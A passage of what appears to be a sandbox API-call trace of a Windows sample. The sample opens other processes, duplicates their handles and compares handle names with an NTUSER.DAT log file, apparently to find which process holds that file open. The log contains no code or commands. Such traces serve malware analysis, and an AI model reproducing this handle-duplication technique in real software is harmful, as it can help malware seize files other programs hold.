lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.250] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.251] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.252] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.252] CloseHandle (hObject=0x1e4) returned 1 [0163.252] _wcsicmp (_Str1="\\Internet Explorer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0163.252] CloseHandle (hObject=0x194) returned 1 [0163.252] CloseHandle (hObject=0x1e8) returned 1 [0163.253] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x208) returned 0x1e8 [0163.253] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.253] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.253] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.261] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.261] CloseHandle (hObject=0x1e4) returned 1 [0163.261] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.261] CloseHandle (hObject=0x194) returned 1 [0163.262] CloseHandle (hObject=0x1e8) returned 1 [0163.262] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x208) returned 0x1e8 [0163.262] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.262] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.265] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.268] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.268] CloseHandle (hObject=0x1e4) returned 1 [0163.268] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.268] CloseHandle (hObject=0x194) returned 1 [0163.268] CloseHandle (hObject=0x1e8) returned 1 [0163.268] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7d4) returned 0x1e8 [0163.268] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.268] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.269] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.270] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.270] CloseHandle (hObject=0x1e4) returned 1 [0163.270] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.270] CloseHandle (hObject=0x194) returned 1 [0163.271] CloseHandle (hObject=0x1e8) returned 1 [0163.271] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7d4) returned 0x1e8 [0163.271] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.271] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.271] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.272] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.272] CloseHandle (hObject=0x1e4) returned 1 [0163.272] _wcsicmp (_Str1="\\Microsoft Office", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.272] CloseHandle (hObject=0x194) returned 1 [0163.273] CloseHandle (hObject=0x1e8) returned 1 [0163.273] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x798) returned 0x1e8 [0163.273] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.273] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.274] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.275] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.275] CloseHandle (hObject=0x1e4) returned 1 [0163.275] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.275] CloseHandle (hObject=0x194) returned 1 [0163.275] CloseHandle (hObject=0x1e8) returned 1 [0163.275] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x798) returned 0x1e8 [0163.275] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.275] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.276] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.277] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.277] CloseHandle (hObject=0x1e4) returned 1 [0163.277] _wcsicmp (_Str1="\\Microsoft.NET", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.277] CloseHandle (hObject=0x194) returned 1 [0163.277] CloseHandle (hObject=0x1e8) returned 1 [0163.277] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5dc) returned 0x1e8 [0163.277] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.277] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.278] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.279] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.279] CloseHandle (hObject=0x1e4) returned 1 [0163.279] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.279] CloseHandle (hObject=0x194) returned 1 [0163.279] CloseHandle (hObject=0x1e8) returned 1 [0163.279] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5dc) returned 0x1e8 [0163.280] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.280] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.283] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.283] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.284] CloseHandle (hObject=0x1e4) returned 1 [0163.284] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.284] CloseHandle (hObject=0x194) returned 1 [0163.284] CloseHandle (hObject=0x1e8) returned 1 [0163.284] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7c4) returned 0x1e8 [0163.284] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.284] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.285] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.285] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.286] CloseHandle (hObject=0x1e4) returned 1 [0163.286] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.286] CloseHandle (hObject=0x194) returned 1 [0163.286] CloseHandle (hObject=0x1e8) returned 1 [0163.286] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7c4) returned 0x1e8 [0163.286] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.286] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.287] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.287] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.288] CloseHandle (hObject=0x1e4) returned 1 [0163.288] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.288] CloseHandle (hObject=0x194) returned 1 [0163.288] CloseHandle (hObject=0x1e8) returned 1 [0163.288] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7d0) returned 0x1e8 [0163.288] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.288] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.289] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.290] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.290] CloseHandle (hObject=0x1e4) returned 1 [0163.290] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.290] CloseHandle (hObject=0x194) returned 1 [0163.290] CloseHandle (hObject=0x1e8) returned 1 [0163.290] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7d0) returned 0x1e8 [0163.290] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.290] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.291] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.292] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.292] CloseHandle (hObject=0x1e4) returned 1 [0163.292] _wcsicmp (_Str1="\\Windows NT", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.292] CloseHandle (hObject=0x194) returned 1 [0163.292] CloseHandle (hObject=0x1e8) returned 1 [0163.292] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x36c) returned 0x1e8 [0163.292] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.292] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.293] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.294] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.294] CloseHandle (hObject=0x1e4) returned 1 [0163.294] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.294] CloseHandle (hObject=0x194) returned 1 [0163.294] CloseHandle (hObject=0x1e8) returned 1 [0163.294] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x36c) returned 0x1e8 [0163.294] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.294] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.295] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.296] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.296] CloseHandle (hObject=0x1e4) returned 1 [0163.296] _wcsicmp (_Str1="\\Common Files", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0163.296] CloseHandle (hObject=0x194) returned 1 [0163.296] CloseHandle (hObject=0x1e8) returned 1 [0163.296] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x54c) returned 0x1e8 [0163.296] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.296] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.300] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.301] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.301] CloseHandle (hObject=0x1e4) returned 1 [0163.301] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.301] CloseHandle (hObject=0x194) returned 1 [0163.301] CloseHandle (hObject=0x1e8) returned 1 [0163.301] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x54c) returned 0x1e8 [0163.302] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.302] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.302] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.303] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.303] CloseHandle (hObject=0x1e4) returned 1 [0163.303] _wcsicmp (_Str1="\\Internet Explorer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0163.303] CloseHandle (hObject=0x194) returned 1 [0163.303] CloseHandle (hObject=0x1e8) returned 1 [0163.303] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x670) returned 0x1e8 [0163.303] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.304] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.304] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.305] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.305] CloseHandle (hObject=0x1e4) returned 1 [0163.305] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.305] CloseHandle (hObject=0x194) returned 1 [0163.306] CloseHandle (hObject=0x1e8) returned 1 [0163.306] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x670) returned 0x1e8 [0163.306] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.306] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.306] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.307] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.307] CloseHandle (hObject=0x1e4) returned 1 [0163.307] _wcsicmp (_Str1="\\Reference Assemblies", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 4 [0163.307] CloseHandle (hObject=0x194) returned 1 [0163.307] CloseHandle (hObject=0x1e8) returned 1 [0163.308] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x78c) returned 0x1e8 [0163.308] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.308] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.308] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.309] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.309] CloseHandle (hObject=0x1e4) returned 1 [0163.309] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.309] CloseHandle (hObject=0x194) returned 1 [0163.309] CloseHandle (hObject=0x1e8) returned 1 [0163.309] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x78c) returned 0x1e8 [0163.310] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.310] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.310] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.311] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.311] CloseHandle (hObject=0x1e4) returned 1 [0163.311] _wcsicmp (_Str1="\\DVD Maker", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -10 [0163.311] CloseHandle (hObject=0x194) returned 1 [0163.311] CloseHandle (hObject=0x1e8) returned 1 [0163.311] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7c8) returned 0x1e8 [0163.311] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.311] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.312] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.313] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.313] CloseHandle (hObject=0x1e4) returned 1 [0163.313] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.313] CloseHandle (hObject=0x194) returned 1 [0163.313] CloseHandle (hObject=0x1e8) returned 1 [0163.313] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7c8) returned 0x1e8 [0163.313] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.313] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.316] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.317] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.317] CloseHandle (hObject=0x1e4) returned 1 [0163.317] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.317] CloseHandle (hObject=0x194) returned 1 [0163.317] CloseHandle (hObject=0x1e8) returned 1 [0163.318] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5cc) returned 0x1e8 [0163.318] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.318] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.318] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.319] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.320] CloseHandle (hObject=0x1e4) returned 1 [0163.320] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.320] CloseHandle (hObject=0x194) returned 1 [0163.320] CloseHandle (hObject=0x1e8) returned 1 [0163.320] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5cc) returned 0x1e8 [0163.320] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.320] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.321] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.322] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.322] CloseHandle (hObject=0x1e4) returned 1 [0163.323] _wcsicmp (_Str1="\\Microsoft Office", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.323] CloseHandle (hObject=0x194) returned 1 [0163.323] CloseHandle (hObject=0x1e8) returned 1 [0163.323] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7bc) returned 0x1e8 [0163.323] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.323] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.324] 